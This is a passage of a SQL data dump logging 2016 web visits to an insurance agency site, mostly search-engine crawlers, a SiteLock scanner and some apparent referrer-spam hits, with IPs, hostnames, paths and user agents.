+http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(15302,'0b_7b28b367c1e1e0eb84c2f8c2cb136494','1460187322','141.8.143.235','spider-141-8-143-235.yandex.com','/SSO/235_29.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(15303,'0b_79f218cd7601f3a53e3fb79b166d2969','1460190682','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(15306,'0b_79f218cd7601f3a53e3fb79b166d2969','1460190684','62.210.148.246','mj9.naefmarco.ch','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(15309,'0b_79f218cd7601f3a53e3fb79b166d2969','1460190686','62.210.148.246','mj9.naefmarco.ch','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(15312,'0b_40991f19fd2686b8ef14d6fb2319bb5a','1460191962','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15315,'0b_40991f19fd2686b8ef14d6fb2319bb5a','1460191994','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15317,'0b_e8e943c0ecf0ad9abf5b2a84115d203e','1460192640','204.79.180.177','204.79.180.177','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15320,'0b_e8e943c0ecf0ad9abf5b2a84115d203e','1460192652','204.79.180.103','204.79.180.103','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15321,'0b_e8a539c02800308f0918a341fb78895c','1460193622','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15324,'0b_48d41b2e21bd4a4cff94e2b33be01546','1460195501','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(15326,'0b_48d41b2e21bd4a4cff94e2b33be01546','1460195503','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(15327,'0b_48d41b2e21bd4a4cff94e2b33be01546','1460195505','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(15329,'0b_f75f9e5134d3618f529615e07f284d18','1460195588','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15330,'0b_f75f9e5134d3618f529615e07f284d18','1460195589','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15332,'0b_f75f9e5134d3618f529615e07f284d18','1460195622','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15335,'0b_73b6dd74010f5afc16813536477c0acc','1460196589','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(15338,'0b_73b6dd74010f5afc16813536477c0acc','1460196590','68.180.230.123','b115363.yse.yahoo.net','/register/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(15341,'0b_d4475772f861f8f84db3790556652df7','1460196872','213.239.205.207','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(15344,'0b_d4475772f861f8f84db3790556652df7','1460196874','213.239.205.207','majestic12.co.uk','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(15347,'0b_d4475772f861f8f84db3790556652df7','1460196876','213.239.205.207','majestic12.co.uk','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(15350,'0b_fb59be464260cdd3002c4d747b759d06','1460203785','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15353,'0b_3b55c09fc96f5486fe1b06f197c33efb','1460204585','91.121.221.15','mansfield2.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(15356,'0b_3b55c09fc96f5486fe1b06f197c33efb','1460204587','91.121.221.15','mansfield2.didici.be','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(15359,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205733','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15362,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205735','144.76.93.46','static.46.93.76.144.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15363,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205738','144.76.93.46','static.46.93.76.144.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15365,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205743','144.76.93.46','static.46.93.76.144.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15368,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205746','144.76.93.46','static.46.93.76.144.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15369,'0b_bcc0ea9307a09bc3b1da695af360a891','1460205748','144.76.93.46','static.46.93.76.144.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15371,'0b_e9401b833f42d792d6f0d870504f5c72','1460206166','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(15374,'0b_e9401b833f42d792d6f0d870504f5c72','1460206166','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(15375,'0b_41666e5c4ec02eff55d900af45b278f8','1460206169','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(15377,'0b_12f0a55c2acf157051e0dacaf52c285d','1460207321','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15378,'0b_32f26247eba566c072b32dbc46846f58','1460211001','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15380,'0b_644cbe2d066d518ef6db58539d43ea1a','1460213513','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.1; http://mortgageestatetax.com','','',0,'','','de','','','WordPress','','','','0','0',0),(15383,'0b_9132ff5051380644c0c71c278a82a0b8','1460214026','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15384,'0b_9132ff5051380644c0c71c278a82a0b8','1460214030','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15386,'0b_9132ff5051380644c0c71c278a82a0b8','1460214032','67.212.162.98','scan03.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15389,'0b_9132ff5051380644c0c71c278a82a0b8','1460214034','67.212.162.98','scan03.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15392,'0b_9132ff5051380644c0c71c278a82a0b8','1460214036','67.212.162.98','scan03.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15395,'0b_9132ff5051380644c0c71c278a82a0b8','1460214038','67.212.162.98','scan03.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15396,'0b_9132ff5051380644c0c71c278a82a0b8','1460214040','67.212.162.98','scan03.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15399,'0b_9132ff5051380644c0c71c278a82a0b8','1460214043','67.212.162.98','scan03.sitelock.com','/case-status/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15402,'0b_340bbf3c1efa459f37f0d5f3593e5ee0','1460214045','67.212.162.98','scan03.sitelock.com','/?p=303','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(15405,'0b_340bbf3c1efa459f37f0d5f3593e5ee0','1460214046','67.212.162.98','scan03.sitelock.com','/?p=8','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(15407,'0b_9132ff5051380644c0c71c278a82a0b8','1460214046','67.212.162.98','scan03.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15408,'0b_a1229d6bee13c5fb283d08e53c6ca2c0','1460219131','94.242.195.186','ip-static-94-242-195-186.server.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(15410,'0b_68974af1d1e35985c3221367251a3b33','1460219136','209.159.137.59','isoroku-tor-exit.itnowork.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(15413,'0b_909a85f825f76a727b4319a204954a9e','1460221324','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15416,'0b_909a85f825f76a727b4319a204954a9e','1460221348','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15419,'0b_909a85f825f76a727b4319a204954a9e','1460221538','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15422,'0b_6d096de10f58746dc09677bb96d1ec25','1460223327','180.76.15.157','baiduspider-180-76-15-157.crawl.baidu.com','/insentives/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15423,'0b_8a1db70f7591a80f4f93e3c489a4a23c','1460224226','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15425,'0b_c01a7e23708c058f1e65c65ab586594c','1460224236','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15428,'0b_952380547fb93512d3f1fc8b1aa21cbd','1460225683','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15431,'0b_952380547fb93512d3f1fc8b1aa21cbd','1460225684','66.249.64.24','crawl-66-249-64-24.googlebot.com','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15434,'0b_9b0cd0307c3ea9a4ed33edb4b718d651','1460227078','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(15437,'0b_20c26969adbe2e4b8710a5ecf93302bb','1460228750','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15440,'0b_20c26969adbe2e4b8710a5ecf93302bb','1460229341','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(15441,'0b_68811b83b0b9c2d7a03a60c177d4aa5d','1460229362','40.77.167.43','msnbot-40-77-167-43.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(15444,'0b_89e77f0d9ce00521eadf76dacb0639e1','1460230545','91.77.27.228','ppp91-77-27-228.pppoe.mtu-net.ru','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36','http://empireins.com/','',0,'Win7','YaBrowser 14','ru','','','','','','','0','0',0),(15447,'0b_89e77f0d9ce00521eadf76dacb0639e1','1460230549','91.77.27.228','ppp91-77-27-228.pppoe.mtu-net.ru','/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','YaBrowser 14','ru','','','','','','','0','0',0),(15450,'0b_89e77f0d9ce00521eadf76dacb0639e1','1460230550','91.77.27.228','ppp91-77-27-228.pppoe.mtu-net.ru','/contact/index.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36','http://www.empireins.com/index.php','',0,'Win7','YaBrowser 14','ru','','','','','','','0','0',0),(15452,'0b_8cb780fc01670b3d95a706d4f4b35fab','1460230663','123.125.71.54','baiduspider-123-125-71-54.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(15453,'0b_a9a5d52bf3355f548bc50e3e3dbb9fd7','1460232437','178.255.215.70','crawl06.exabot.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(15455,'0b_eeac351831a3e57e72227934cb672b20','1460234511','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15458,'0b_21857e50b89a89a3940b9e4c2036f59d','1460237458','40.77.167.43','msnbot-40-77-167-43.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15459,'0b_6be92f2cad1bb79b7e4a94fb5e4b6f14','1460239815','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(15461,'0b_550dadecebafda04e691aeced3c0e3f5','1460240057','66.87.121.220','66-87-121-220.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/13C75 Safari/601.1.46','','',0,'iPhone OS','CriOS 49 Mobile','us','','','','','','','0','0',0),(15462,'0b_550dadecebafda04e691aeced3c0e3f5','1460240058','66.87.121.220','66-87-121-220.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/13C75 Safari/601.1.46','','',0,'iPhone OS','CriOS 49 Mobile','us','','','','','','','0','0',0),(15464,'0b_5927168735b9c6112e4e3969e9359e3a','1460243405','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15465,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245521','5.9.87.111','static.111.87.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15467,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245523','5.9.87.111','static.111.87.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15468,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245524','5.9.87.111','static.111.87.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15471,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245526','5.9.87.111','static.111.87.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15473,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245528','5.9.87.111','static.111.87.9.5.clients.your-server.de','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15474,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245533','5.9.87.111','static.111.87.9.5.clients.your-server.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15477,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245541','5.9.87.111','static.111.87.9.5.clients.your-server.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15480,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245546','5.9.87.111','static.111.87.9.5.clients.your-server.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15482,'0b_8939b082b1cc4b0f91e77e815b9f0eb2','1460245548','5.9.87.111','static.111.87.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15483,'0b_cdec4ae10e11a9caaf9eac6fc01c91cf','1460249601','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15486,'0b_5d1d8e58ddebb59debd615cdedb9c393','1460250517','93.180.64.150','ykoon.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(15488,'0b_7703a15d3ea04bb9ae332b39f10a5428','1460250517','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(15491,'0b_5d1d8e58ddebb59debd615cdedb9c393','1460250519','93.180.64.150','ykoon.net','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15492,'0b_00535b47e62b024cfbfbeadad3849e9b','1460251670','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15494,'0b_5edf2530c05200b331cb22407f6f8d46','1460253795','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15495,'0b_5edf2530c05200b331cb22407f6f8d46','1460253798','136.243.152.18','static.18.152.243.136.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15497,'0b_5edf2530c05200b331cb22407f6f8d46','1460253800','136.243.152.18','static.18.152.243.136.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15500,'0b_5edf2530c05200b331cb22407f6f8d46','1460253802','136.243.152.18','static.18.152.243.136.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15501,'0b_5edf2530c05200b331cb22407f6f8d46','1460253805','136.243.152.18','static.18.152.243.136.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15503,'0b_5edf2530c05200b331cb22407f6f8d46','1460253807','136.243.152.18','static.18.152.243.136.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(15506,'0b_363900bcf8893bb1cbb14c05c0940e3f','1460255844','66.249.64.160','crawl-66-249-64-160.googlebot.com','/licensing-contracting/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(15509,'0b_085a0b8d61c3971b98635b5f30587b1c','1460256987','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15510,'0b_26080310374e0fceb42df17903e096fb','1460258260','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/agent-tools/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15512,'0b_8d13dbc0ae20bc25a705a408c0f9bf42','1460258491','192.210.217.15','192-210-217-15-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'WinXP','Firefox 34','us','','','','','','','0','0',0),(15513,'0b_9332db05bf686ada0222734a186b55c2','1460258865','65.19.167.131','65.19.167.131','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(15515,'0b_e94e85cc108538026688545744010ebd','1460258885','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(15516,'0b_1aaf92e3da2f43d192f592054158c2ff','1460259598','85.248.227.163','ori.enn.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 